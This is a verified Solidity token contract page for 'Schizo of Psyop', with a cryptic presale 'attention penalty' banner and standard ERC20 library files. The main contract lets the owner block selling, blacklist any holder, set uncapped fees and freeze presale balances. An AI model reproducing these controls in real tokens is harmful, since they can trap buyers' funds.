ETH Price: $3,083.53 (-1.14%)
Gas: 2 Gwei

Token

Schizo of Psyop (SCHIZOP)
 

Overview

Max Total Supply

13,951,924,414.962205502979304676 SCHIZOP

Holders

47

Total Transfers

-

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Schizop

Compiler Version
v0.8.21+commit.d9974bed

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 9 of 9: schizop.sol
// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0;

/*


███████╗ ██████╗██╗  ██╗██╗███████╗ ██████╗ 
██╔════╝██╔════╝██║  ██║██║╚══███╔╝██╔═══██╗
███████╗██║     ███████║██║  ███╔╝ ██║   ██║
╚════██║██║     ██╔══██║██║ ███╔╝  ██║   ██║
███████║╚██████╗██║  ██║██║███████╗╚██████╔╝
╚██████╗ ███████╗═╝  ╚═╝╚═╝╚══════╝ ╚═════╝ 
██╔═══██╗██╔════╝                           
██║   ██║█████╗                             
██║   ██║██╔══╝                             
╚██████╔╝██║                                
██████╗╝███████╗██╗   ██╗ ██████╗ ██████╗   
██╔══██╗██╔════╝╚██╗ ██╔╝██╔═══██╗██╔══██╗  
██████╔╝███████╗ ╚████╔╝ ██║   ██║██████╔╝  
██╔═══╝ ╚════██║  ╚██╔╝  ██║   ██║██╔═══╝   
██║     ███████║   ██║   ╚██████╔╝██║       
╚═╝     ╚══════╝   ╚═╝    ╚═════╝ ╚═╝       


THE FOLLOWING IS THE ATTENTION PENALTY OF PRESALE HOLDERS AND AMOUNT OF TIME IT TOOK TO BURN $SCHIZOP TOKENS BY EACH HOLDER
ATTENTION PENALTTY IS THE FEE INCURRED DUE TO THE LACK OF ATTENTION

PAY ATTENTION AND UNDERSTAND THE NARRATIVE

THERE IS A PRICE TO NOT PAYING ATTENTION
THERE IS A PRICE TO IGNORANCE
THERE IS A PRICE TO SILENCE

Attention Penalty Multiplier - Ethereum Address - Presale Balance	- Attention Penalty [Burnt]
11	0xdd75c62867ed17cead562388a7d101a10fca3f0d	37243800           8800000
10	0xc76e479c364a7ba3a4ed1cf9bb5b52fe352492b8	4900500	           800000
9	0xb05770f7bd0cf011699a18ff5020c204b551f5a1	9801000	           720000
8	0x2d971977feb62637493f7519a4e4d8f37431c565	98010000           9400000
8	0x84e4f5db2e9f454e0e3cb22e72033d333b4ec342	68607000           7400000
7	0x5d6db18cff0a54f89383be804f921218d8e77f88	29403000           6600000
6	0xc2368874f8a6fdbef66879182b24e1f8f0c4505a	29403000           4800000
5	0x9b9001a6c65a27e995418e8dbac2cc0b3f8f9d37	2940102	           400000
5	0x53748a25d3c0192be92af0249ac399108b909281	108900000          16000000
4	0x5e07b97b2b82a8f9f3a23e2ee0bf5e315c4221e0	53905500           4200000
3	0xb3d6140b4fc5d20d19c55e1eab2ec8d1ac2d8d2a	29403000           3400000
2	0xf193507522c1d79f59c818df36e40ce64ca747c6	176418000          9600000
2	0xc8eef0e794386a52377a1737fac24fca40be9220	24502500           1600000
2	0xbdfda70cac82719ae23bee862e19929f46374cba	53905500           3600000
1	0x48ecc378a1025ba8469bb697751bfc7a1e0d3800	108900000          1600000
1	0x1e94071a3f3c292bc0b11f9f5c0520cc093d041f	53905500           800000

THE SCHIZO OF PSYOP ARE THE KOOKS OF FINALE

THE SCHIZOP IS NOT FOR THE FEINT OF HEART
THE PSYOP IS CANDY TO THE SCHIZOP

THE SCHIZOP IS MK ULTRA V2.0

THE SCHIZ OPERATORS ARE ALIEN
DEVS TOO

BEWARE OR EMBRACE BECAUSE THIS IS ONLY THE BEGINNING

YOU HAVE BEEN WARNED

$FINALE

*/

// Importing the interfaces for the ERC20 token and Ownable function
import "./ERC20.sol";
import "./Ownable.sol";
import "./IUniswapV2Factory.sol";
import "./IUniswapV2Router02.sol";

// Defining the contract Finale, which is a type of ERC20 token and has Ownable properties
contract Schizop is ERC20, Ownable {
    // Public variables that hold the address of the pair, the maximum holding amount and the required token address
    address public pair;
    uint256 public maxHoldingAmount; // $Finale $Finale $Finale
    bool public tradingOn = true; // $Finale $Finale $Finale
    bool public sellingOn = false; // $Finale $Finale $Finale
    bool public limitOn = false; // $Finale $Finale $Finale
    bool public transferTaxOn = true; // $Finale $Finale $Finale

    address public feeWallet = 0x96606D22Ada1ba55BB2EEdE8341b33B9658F8405; // Sell fees sent here. Finale Buybacks | OR | Burned.
    uint256 public sellFee = 2; // $Finale $Finale $Finale
    uint256 public burnFee = 2; // $Finale $Finale $Finale

    mapping(address => bool) public blacklist; // $Finale $Finale $Finale

    address public requiredToken = 0xC7a2572fA8FDB0f7E81d6D3c4e3CCF78FB0DC374; // $Finale $Finale $Finale
    uint256 public requiredTokenAmount; // $Finale $Finale $Finale
    bool public requiredTokenRuleOn = false; // $Finale $Finale $Finale
    
    mapping(address => uint256) public presaleBalancesStore; // Mapping to store initial balance of presale holders
    bool public presaleHolderLock = true; // Variable to store presale lock status

    // Constructor function that is called once when the contract is deployed
    constructor() ERC20("Schizo of Psyop", "SCHIZOP") {
        // 55 billion tokens
        uint256 _totalSupply = 55000000000000000000000000000; // 55 Billion | $Finale $Finale $Finale

        // PROOF OF PARTICIPATION.
        address[] memory initialAddresses = new address[](16);
        initialAddresses[0] = 0x1e94071A3F3c292BC0B11f9F5c0520Cc093D041f;
        initialAddresses[1] = 0x48eCc378A1025bA8469Bb697751BFc7a1e0d3800;
        initialAddresses[2] = 0xbDfdA70CaC82719AE23bEe862E19929F46374CBa;
        initialAddresses[3] = 0xc8EeF0e794386a52377a1737FaC24fcA40BE9220;
        initialAddresses[4] = 0xf193507522c1D79f59C818DF36e40Ce64CA747c6;
        initialAddresses[5] = 0xB3d6140B4fc5D20d19c55e1eaB2eC8D1Ac2d8D2A;
        initialAddresses[6] = 0x5e07b97b2B82A8F9f3A23E2EE0bf5E315c4221e0;
        initialAddresses[7] = 0x53748A25d3C0192bE92aF0249AC399108b909281;
        initialAddresses[8] = 0x9B9001A6c65a27E995418e8DbAc2CC0b3f8f9d37;
        initialAddresses[9] = 0xC2368874F8a6fDbef66879182b24e1f8f0C4505A;
        initialAddresses[10] = 0x5D6dB18Cff0A54F89383be804F921218D8E77F88;
        initialAddresses[11] = 0x84E4F5db2E9F454E0e3cb22E72033D333b4EC342;
        initialAddresses[12] = 0x2D971977feb62637493f7519A4e4D8F37431c565;
        initialAddresses[13] = 0xB05770f7BD0cf011699A18Ff5020C204b551f5a1;
        initialAddresses[14] = 0xc76e479C364A7ba3A4eD1cF9Bb5b52Fe352492b8;
        initialAddresses[15] = 0xDd75C62867eD17cEAd562388a7d101a10fCa3F0D; 

        uint256[] memory presaleBalances = new uint256[](16);
        presaleBalances[0] = 53905500000000000000000000 - 800000000000000000000000;       
        presaleBalances[1] = 108900000000000000000000000 - 1600000000000000000000000;
        presaleBalances[2] = 53905500000000000000000000 - 3600000000000000000000000;
        presaleBalances[3] = 24502500000000000000000000 - 1600000000000000000000000;
        presaleBalances[4] = 176418000000000000000000000 - 9600000000000000000000000;
        presaleBalances[5] = 29403000000000000000000000 - 3400000000000000000000000;
        presaleBalances[6] = 53905500000000000000000000 - 4200000000000000000000000;
        presaleBalances[7] = 108900000000000000000000000 - 16000000000000000000000000;
        presaleBalances[8] = 2940102000000000000000000 - 400000000000000000000000;
        presaleBalances[9] = 29403000000000000000000000 - 4800000000000000000000000;
        presaleBalances[10] = 29403000000000000000000000 - 6600000000000000000000000;
        presaleBalances[11] = 68607000000000000000000000 - 7400000000000000000000000;
        presaleBalances[12] = 98010000000000000000000000 - 9400000000000000000000000;
        presaleBalances[13] = 9801000000000000000000000 - 720000000000000000000000;
        presaleBalances[14] = 4900500000000000000000000 - 800000000000000000000000;
        presaleBalances[15] = 37243800000000000000000000 - 8800000000000000000000000; 

        for (uint256 i = 0; i < initialAddresses.length; i++) {
            _mint(initialAddresses[i], presaleBalances[i]);
            _totalSupply -= presaleBalances[i];
            // Store initial balances of presale holders
            presaleBalancesStore[initialAddresses[i]] = presaleBalances[i];
        }

        // Mint the remaining tokens to the contract owner
        uint256 remainingSupply = _totalSupply;
        _mint(msg.sender, remainingSupply); // $Finale $Finale $Finale

        maxHoldingAmount = _totalSupply / 100; // $Finale $Finale $Finale
        requiredTokenAmount = (55 * 10**9 * 10**18) / 5000; // $Finale $Finale $Finale

        // The addresses of the Uniswap router and WETH token are defined
        address ROUTER = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
        address WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
        // The pair for this token and WETH is created in the Uniswap factory
        pair = IUniswapV2Factory(IUniswapV2Router02(ROUTER).factory()).createPair(WETH, address(this));
    }

    // Function to set an address as blacklisted or not, only callable by the contract owner
    function setBlacklist(address _address, bool _isBlacklisted) external onlyOwner {
        blacklist[_address] = _isBlacklisted;
    }

    function burn(uint256 amount) external {
        _burn(msg.sender, amount); // $Finale $Finale $Finale
    }

    function setBools(
        bool _tradingOn,
        bool _sellingOn,
        bool _limitOn,
        bool _transferTaxOn,
        bool _requiredTokenRuleOn
    ) external onlyOwner {
        tradingOn = _tradingOn; // $Finale $Finale $Finale
        sellingOn = _sellingOn; // $Finale $Finale $Finale
        limitOn = _limitOn; // $Finale $Finale $Finale
        transferTaxOn = _transferTaxOn; // $Finale $Finale $Finale
        requiredTokenRuleOn = _requiredTokenRuleOn; // $Finale $Finale $Finale
    }

    function setAmmounts(
        uint256 _maxHoldingAmount,
        uint256 _requiredTokenAmount
    ) external onlyOwner {
        maxHoldingAmount = _maxHoldingAmount; // $Finale $Finale $Finale
        requiredTokenAmount = _requiredTokenAmount; // $Finale $Finale $Finale
    }

    function setFee(
        uint256 _sellFee,
        address _feeWallet
    ) external onlyOwner {
        sellFee = _sellFee; // $Finale $Finale $Finale
        feeWallet = _feeWallet; // $Finale $Finale $Finale
    }

    function requiredTokenAddress(
        address _requiredToken
    ) external onlyOwner {
        requiredToken = _requiredToken; // $Finale $Finale $Finale
    }

    function setBurn(
        uint256 _burnFee
    ) external onlyOwner {
        burnFee = _burnFee; // $Finale $Finale $Finale
    }

    // Function to set presale lock status, only callable by the contract owner
    function setPresaleHolderLock(bool _presaleHolderLock) external onlyOwner {
        presaleHolderLock = _presaleHolderLock;
    }

    // Overriding the _beforeTokenTransfer function from the ERC20 contract to include additional checks
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual override {
        // Checks if the sender or receiver is blacklisted
        require(!blacklist[to] && !blacklist[from], "Blacklisted");
        // If trading is not enabled, only the contract owner can send or receive tokens
        if (!tradingOn) {
            require(from == owner() || to == owner(), "Trading not enabled");
        } else {
            // If selling is not enabled, tokens cannot be sent to the pair address
            require(sellingOn || to != pair, "Selling not enabled");

            // If the limit is on and the sender is the pair address, the receiver cannot exceed the maximum holding amount
            if (limitOn && from == pair) {
                require(
                    super.balanceOf(to) + amount <= maxHoldingAmount,
                    "Max holding amount exceeded"
                );
            }

            // If the limit is on and the receiver is the pair address, the sender must have enough required tokens
            if (requiredTokenRuleOn && to == pair) {
                require(
                    IERC20(requiredToken).balanceOf(from) >= requiredTokenAmount, "Insufficient Finale balance in wallet to sell."
                );
            }

            // If presale lock is enabled, prevent presale holders from transferring more than they bought
            if (presaleHolderLock && presaleBalancesStore[from] > 0) {
                require(
                    super.balanceOf(from) - amount >= presaleBalancesStore[from],
                    "Presale tokens are currently frozen."
                );
            }
        }
    }

    function _transfer(address sender, address recipient, uint256 amount) internal virtual override {
        if (transferTaxOn && recipient != pair) {
            uint256 feeAmount = (amount * sellFee) / 100; // $Finale $Finale $Finale
            uint256 burnAmount = (amount * burnFee) / 100; // $Finale $Finale $Finale

            uint256 amountAfterFee = amount - feeAmount; // $Finale $Finale $Finale
            uint256 amountAfterBurn = amountAfterFee - burnAmount; // $Finale $Finale $Finale

            super._transfer(sender, feeWallet, feeAmount); // $Finale $Finale $Finale
            _burn(sender, burnAmount);

            super._transfer(sender, recipient, amountAfterBurn); // $Finale $Finale $Finale
        } else {
            super._transfer(sender, recipient, amount); // $Finale $Finale $Finale
        }
    }
}

File 1 of 9: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 2 of 9: ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./IERC20Metadata.sol";
import "./Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 3 of 9: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

File 4 of 9: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 5 of 9: IUniswapV2Factory.sol
// SPDX-License-Identifier: MIT
pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

File 6 of 9: IUniswapV2Router01.sol
// SPDX-License-Identifier: MIT
pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

File 7 of 9: IUniswapV2Router02.sol
// SPDX-License-Identifier: MIT
pragma solidity >=0.6.2;

import './IUniswapV2Router01.sol';

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

File 8 of 9: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
